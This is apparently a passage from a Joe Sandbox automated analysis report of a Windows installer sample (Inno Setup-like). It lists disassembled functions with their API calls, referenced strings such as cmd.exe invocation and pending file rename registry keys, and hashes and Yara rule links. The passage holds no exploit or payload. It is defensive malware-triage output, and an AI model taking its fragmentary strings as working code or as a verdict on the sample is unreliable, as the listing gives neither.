                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                  • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                  • API String ID: 4130936913-2943970505
                                                                  • Opcode ID: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                                  • Instruction ID: fc358bcdd7e5b0606a48ee3fdcf498d476493da3f5408fce691eb0e46a0d48ea
                                                                  • Opcode Fuzzy Hash: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                                  • Instruction Fuzzy Hash: D0F082B04583409AE300EB25994271E77D0EF58318F10463FF898A6392D7385900CB6F
                                                                  Function 00454FE4 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200,00000000), ref: 0045518E
                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200), ref: 0045519B
                                                                    • Part of subcall function 00454F50: WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                                    • Part of subcall function 00454F50: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                                    • Part of subcall function 00454F50: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                                    • Part of subcall function 00454F50: CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                  • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                  • API String ID: 854858120-615399546
                                                                  • Opcode ID: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                                  • Instruction ID: 453c4c1e4331516b603b6bd36f4112f8bfb414d7ddeab97af99533fe31520792
                                                                  • Opcode Fuzzy Hash: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                                  • Instruction Fuzzy Hash: 7A516C34B0074D6BDB11EF95C852BEEBBB9AF44305F50407BB804B7293D7789A098B59
                                                                  Function 00423684 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                                  • OemToCharA.USER32(?,?), ref: 00423754
                                                                  • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Char$FileIconLoadLowerModuleName
                                                                  • String ID: 2$MAINICON
                                                                  • API String ID: 3935243913-3181700818
                                                                  • Opcode ID: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                                  • Instruction ID: 89b1690b288838b812280c83b83aa3621e89473e571b5a361368100100c68adf
                                                                  • Opcode Fuzzy Hash: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                                  • Instruction Fuzzy Hash: BD31D570A042559ADB10EF69C8C57CA3BE89F14308F4441BAE844DB383D7BED988CB59
                                                                  Function 00418F30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F35
                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F56
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00418F71
                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F92
                                                                    • Part of subcall function 004230C0: 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                                    • Part of subcall function 004230C0: EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                                    • Part of subcall function 004230C0: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                                    • Part of subcall function 004230C0: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                                    • Part of subcall function 00423684: LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                                    • Part of subcall function 00423684: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                                    • Part of subcall function 00423684: OemToCharA.USER32(?,?), ref: 00423754
                                                                    • Part of subcall function 00423684: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                                    • Part of subcall function 0041F110: GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                                    • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                                    • Part of subcall function 0041F110: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                                    • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                                    • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                  • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                  • API String ID: 3864787166-2767913252
                                                                  • Opcode ID: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                                  • Instruction ID: 27c32735182dabff7e1c09a1de9b3c03b849675df7244bb9ef6d39ac7a5e8d86
                                                                  • Opcode Fuzzy Hash: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                                  • Instruction Fuzzy Hash: 7A11FC70A182409AD704FF66A94275A76E1DB6830CF40853FF448AB391DB39A9458BAF
                                                                  Function 00413634 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$Prop
                                                                  • String ID:
                                                                  • API String ID: 3887896539-0
                                                                  • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                  • Instruction ID: 2f0da8c2a639c8e1c6f1513ac1b217b7872104ca576cf6b7b6160f367be9faf8
                                                                  • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                  • Instruction Fuzzy Hash: 8C11B775100244BFEF00DF9DDC84EDA37A8EB19364F144666B958DB2A2D738D9908B68
                                                                  Function 00471F5C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 263fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 00472109
                                                                  • FindClose.KERNEL32(000000FF,00472134,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472127
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 0047222B
                                                                  • FindClose.KERNEL32(000000FF,00472256,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472249
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileNext
                                                                  • String ID: p%G
                                                                  • API String ID: 2066263336-2885399958
                                                                  • Opcode ID: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                                  • Instruction ID: c5c343863c2eea904beb919c2ff7085193d8c56025a8159f133c7515c1d415d1
                                                                  • Opcode Fuzzy Hash: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                                  • Instruction Fuzzy Hash: F4B12B3490424D9FCF11DFA5C981ADEBBB9FF49304F5081AAE908B3251D7789A46CF68
                                                                  Function 004556AC Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00455843,?,00000000,00455883), ref: 00455789
                                                                  Strings
                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0045570C
                                                                  • PendingFileRenameOperations, xrefs: 00455728
                                                                  • PendingFileRenameOperations2, xrefs: 00455758
                                                                  • WININIT.INI, xrefs: 004557B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                  • API String ID: 47109696-2199428270
                                                                  • Opcode ID: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                                  • Instruction ID: 0b70bbd74ac5003506c3e48668489f2f7adcdad68ca58941e5d407b4478d915f
                                                                  • Opcode Fuzzy Hash: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                                  • Instruction Fuzzy Hash: 0C518430E006489FDB10EF61DC51AEEB7B9EF44305F50857BE804A7292DB78AE49CA58
                                                                  Function 0047C378 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C40B
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C414
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                  • API String ID: 1375471231-2952887711
                                                                  • Opcode ID: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                                  • Instruction ID: d537758c7117fefc82ee858029cb7c27e5ed8caa62090c64dc1ceeedb24f0412
                                                                  • Opcode Fuzzy Hash: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                                  • Instruction Fuzzy Hash: A0411774A001099BCB01EFA5C892ADEB7B5EF44305F50857BE814B7392DB38AE058B6D
                                                                  Function 00423A7C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnumWindows.USER32(00423A14), ref: 00423AA0
                                                                  • GetWindow.USER32(?,00000003), ref: 00423AB5
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                                  • SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnumLongWindows
                                                                  • String ID: TAB
                                                                  • API String ID: 4191631535-3846439302
                                                                  • Opcode ID: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                                  • Instruction ID: 44c8a23491b9c45dd34cf4bcc3c04de93252e86aee0086cff54aee2134896fd7
                                                                  • Opcode Fuzzy Hash: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                                  • Instruction Fuzzy Hash: 7B112A70704610ABDB10DF28D985F5677E8EB08725F51026AF994EB2E3C378AD41CB59
                                                                  Function 0042DE3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE48
                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFE3,00000000,0042DFFB,?,?,?,?,00000006,?,00000000,00496D69), ref: 0042DE63
                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE69
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDeleteHandleModuleProc
                                                                  • String ID: RegDeleteKeyExA$advapi32.dll
                                                                  • API String ID: 588496660-1846899949
                                                                  • Opcode ID: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                                  • Instruction ID: 9c024767392e34e1239b6ccdb0e78e824d69575b4a8d701ce7db5acd733af5c1
                                                                  • Opcode Fuzzy Hash: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                                  • Instruction Fuzzy Hash: B2E06DF1B41B30AAD72426697C8AFA72728DB74365F618537B105AD1A183FC1C50CE9D
                                                                  Function 0046B930 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Need to restart Windows? %s, xrefs: 0046BCB5
                                                                  • PrepareToInstall failed: %s, xrefs: 0046BC8E
                                                                  • NextButtonClick, xrefs: 0046BA6C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                  • API String ID: 0-2329492092
                                                                  • Opcode ID: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                                  • Instruction ID: ef605359146084d2a330ce9392c81193c54d44d6395a219c566c339d74a55226
                                                                  • Opcode Fuzzy Hash: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                                  • Instruction Fuzzy Hash: F6D12A34A04108DFCB10EF99D585AEE77F5EF49304F6444BAE400AB352D778AE81CB9A
                                                                  Function 00482648 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 224COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetActiveWindow.USER32(?,?,00000000,00482990), ref: 0048276C
                                                                  • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482801
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ActiveChangeNotifyWindow
                                                                  • String ID: $Need to restart Windows? %s
                                                                  • API String ID: 1160245247-4200181552
                                                                  • Opcode ID: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                                  • Instruction ID: d92f6dc0c394a11860c555715cc1377d1ab7d31dc5c27e132739ea4afdffe6c1
                                                                  • Opcode Fuzzy Hash: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                                  • Instruction Fuzzy Hash: 5291A274A042049FDB10FB69D986BAD77F4AF55308F1084BBE8009B362D7B86D05CB5D
                                                                  Function 0046F8FC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                  • GetLastError.KERNEL32(00000000,0046FAF9,?,?,0049C1D0,00000000), ref: 0046F9D6
                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FA50
                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FA75
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                  • String ID: Creating directory: %s
                                                                  • API String ID: 2451617938-483064649
                                                                  • Opcode ID: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                                  • Instruction ID: 2bd83b05653ced0f0f619092410e1b81403e7cd9e02354fb4b3544f6b0b1216d
                                                                  • Opcode Fuzzy Hash: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                                  • Instruction Fuzzy Hash: 0F512174E00248ABDB01DFE9D582BDEBBF5AF48304F50847AE844B7396D7785E088B59
                                                                  Function 00454DA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E56
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F1C), ref: 00454EC0
